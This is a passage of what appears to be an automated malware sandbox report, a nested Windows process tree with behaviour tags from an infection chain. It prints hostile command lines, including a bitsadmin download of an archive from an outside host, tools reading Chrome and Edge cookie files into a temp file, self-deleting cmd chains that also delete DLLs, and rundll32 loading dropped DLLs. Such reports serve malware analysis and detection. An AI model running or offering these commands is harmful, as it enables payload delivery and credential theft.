                                                                                                                taskkill /F /PID 4440
                                                                                                                9⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:4860
                                                                                                        • C:\Users\Admin\Documents\BhhskcDq6FzBD12qRlQEB6cH.exe
                                                                                                          "C:\Users\Admin\Documents\BhhskcDq6FzBD12qRlQEB6cH.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          PID:3952
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            7⤵
                                                                                                              PID:5188
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                8⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:5476
                                                                                                          • C:\Users\Admin\Documents\ZKfBZzY231_jxCKIynFIEsPd.exe
                                                                                                            "C:\Users\Admin\Documents\ZKfBZzY231_jxCKIynFIEsPd.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                            PID:3708
                                                                                                            • C:\Users\Public\run.exe
                                                                                                              C:\Users\Public\run.exe
                                                                                                              7⤵
                                                                                                                PID:4592
                                                                                                                • C:\Users\Public\run.exe
                                                                                                                  C:\Users\Public\run.exe
                                                                                                                  8⤵
                                                                                                                    PID:5128
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\run.exe"
                                                                                                                      9⤵
                                                                                                                        PID:5216
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          10⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5488
                                                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                                                          timeout /T 10 /NOBREAK
                                                                                                                          10⤵
                                                                                                                          • Delays execution with timeout.exe
                                                                                                                          PID:4164
                                                                                                                • C:\Users\Admin\Documents\X1YL1rXVuoTFnDcxfKnI6Qai.exe
                                                                                                                  "C:\Users\Admin\Documents\X1YL1rXVuoTFnDcxfKnI6Qai.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:4740
                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5100
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                      8⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4080
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                      8⤵
                                                                                                                        PID:4956
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                        8⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:5656
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                        8⤵
                                                                                                                          PID:5704
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                          8⤵
                                                                                                                            PID:5756
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4268
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5352
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5448
                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          PID:2732
                                                                                                                        • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                          "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:1544
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4436
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                            8⤵
                                                                                                                              PID:5796
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                              8⤵
                                                                                                                                PID:5196
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                8⤵
                                                                                                                                  PID:6048
                                                                                                                            • C:\Users\Admin\Documents\6JMGx6XjuvqaE_57zu3ZIyUU.exe
                                                                                                                              "C:\Users\Admin\Documents\6JMGx6XjuvqaE_57zu3ZIyUU.exe"
                                                                                                                              6⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4544
                                                                                                                              • C:\Users\Admin\Documents\6JMGx6XjuvqaE_57zu3ZIyUU.exe
                                                                                                                                "C:\Users\Admin\Documents\6JMGx6XjuvqaE_57zu3ZIyUU.exe" -a
                                                                                                                                7⤵
                                                                                                                                  PID:5000
                                                                                                                              • C:\Users\Admin\Documents\ZxvtxA0HmMC1q7c0lQ6ZnVRF.exe
                                                                                                                                "C:\Users\Admin\Documents\ZxvtxA0HmMC1q7c0lQ6ZnVRF.exe"
                                                                                                                                6⤵
                                                                                                                                  PID:2240
                                                                                                                                • C:\Users\Admin\Documents\40r0IS6PE1VxeRh01tWoSjFD.exe
                                                                                                                                  "C:\Users\Admin\Documents\40r0IS6PE1VxeRh01tWoSjFD.exe"
                                                                                                                                  6⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  PID:2244
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 40r0IS6PE1VxeRh01tWoSjFD.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\40r0IS6PE1VxeRh01tWoSjFD.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                    7⤵
                                                                                                                                      PID:5416
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im 40r0IS6PE1VxeRh01tWoSjFD.exe /f
                                                                                                                                        8⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:5820
                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        timeout /t 6
                                                                                                                                        8⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                        PID:5704
                                                                                                                                  • C:\Users\Admin\Documents\WHmYJWwJP7_MQHb4ibRlt1EM.exe
                                                                                                                                    "C:\Users\Admin\Documents\WHmYJWwJP7_MQHb4ibRlt1EM.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:3808
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      7⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1456
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      7⤵
                                                                                                                                        PID:5732
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        7⤵
                                                                                                                                          PID:4812
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                          7⤵
                                                                                                                                            PID:3456
                                                                                                                                        • C:\Users\Admin\Documents\2ZdDge3LwrP5i4Q00igcrur4.exe
                                                                                                                                          "C:\Users\Admin\Documents\2ZdDge3LwrP5i4Q00igcrur4.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                          PID:3248
                                                                                                                                          • C:\Users\Admin\Documents\2ZdDge3LwrP5i4Q00igcrur4.exe
                                                                                                                                            C:\Users\Admin\Documents\2ZdDge3LwrP5i4Q00igcrur4.exe
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:3704
                                                                                                                                        • C:\Users\Admin\Documents\0J0jyEA4KQnEI1dpJiWYpc0n.exe
                                                                                                                                          "C:\Users\Admin\Documents\0J0jyEA4KQnEI1dpJiWYpc0n.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4812
                                                                                                                                          • C:\Users\Admin\Documents\0J0jyEA4KQnEI1dpJiWYpc0n.exe
                                                                                                                                            "C:\Users\Admin\Documents\0J0jyEA4KQnEI1dpJiWYpc0n.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                            PID:5000
                                                                                                                                        • C:\Users\Admin\Documents\g9eo6apfiLgaZZ_V8KvQGZlb.exe
                                                                                                                                          "C:\Users\Admin\Documents\g9eo6apfiLgaZZ_V8KvQGZlb.exe"
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                          PID:4588
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                            7⤵
                                                                                                                                              PID:4120
                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                              7⤵
                                                                                                                                                PID:2772
                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                7⤵
                                                                                                                                                  PID:4680
                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                  7⤵
                                                                                                                                                    PID:3176
                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                    7⤵
                                                                                                                                                      PID:5828
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                      7⤵
                                                                                                                                                        PID:5744
                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                        7⤵
                                                                                                                                                        • Checks for any installed AV software in registry
                                                                                                                                                        PID:5612
                                                                                                                                                      • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                        "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                                                        7⤵
                                                                                                                                                        • Download via BitsAdmin
                                                                                                                                                        PID:5472
                                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pnLBevXQnRnohLuH -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:4896
                                                                                                                                                        • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                                                          "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfy5nofGbTcOx4Im -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:4188
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:4576
                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                              7⤵
                                                                                                                                                                PID:1548
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:4004
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:2020
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:6020
                                                                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IlDjZMyUhJn\IlDjZMyUhJn.dll" IlDjZMyUhJn
                                                                                                                                                                      7⤵
                                                                                                                                                                        PID:1900
                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                          C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\IlDjZMyUhJn\IlDjZMyUhJn.dll" IlDjZMyUhJn
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4392
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:3244
                                                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                              8⤵
                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:5128
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:5140
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:4144
                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  8⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  PID:5756
                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                                7⤵
                                                                                                                                                                                  PID:4360
                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsrA1C1.tmp\tempfile.ps1"
                                                                                                                                                                                  7⤵
                                                                                                                                                                                    PID:3184
                                                                                                                                                                                  • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                                                                    "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                                                                    7⤵
                                                                                                                                                                                      PID:5544
                                                                                                                                                                                  • C:\Users\Admin\Documents\gtZGTGRJeFvVOOyOEiRvAER7.exe
                                                                                                                                                                                    "C:\Users\Admin\Documents\gtZGTGRJeFvVOOyOEiRvAER7.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:3464
                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3464 -s 632
                                                                                                                                                                                      7⤵
                                                                                                                                                                                      • Program crash
                                                                                                                                                                                      PID:5036
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                                                                4⤵
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:2092
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS04AC7464\sonia_6.exe
                                                                                                                                                                                  sonia_6.exe
                                                                                                                                                                                  5⤵
                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:3548
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:2112
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                    PID:1400
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5744
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:2824
                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 544
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • Program crash
                                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                    PID:1184
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:1176
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:636
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:4288
                                                                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                                                                  C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:4972
                                                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                                                PID:4172
                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                                                  PID:4200
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\F108.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\F108.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                PID:5508
                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                PID:5580
                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                  2⤵
                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                  PID:5600
                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                                                1⤵
                                                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                                                PID:5884
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\8F9B.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\8F9B.exe
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:5740
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im 8F9B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\8F9B.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:3836
                                                                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                        taskkill /im 8F9B.exe /f
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Kills process with taskkill
                                                                                                                                                                                        PID:3868
                                                                                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                        timeout /t 6
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Delays execution with timeout.exe
                                                                                                                                                                                        PID:5728
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\9623.exe
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\9623.exe
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4176
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\9A0C.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\9A0C.exe
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:2096
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A047.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A047.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:5732
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\A3F2.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\A3F2.exe
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:5716
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A5C7.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A5C7.exe
                                                                                                                                                                                          1⤵
                                                                                                                                                                                            PID:5852
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\AA8B.exe
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\AA8B.exe
                                                                                                                                                                                            1⤵
                                                                                                                                                                                              PID:5476
                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                cmd /c start c.exe & start l.exe
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:4688
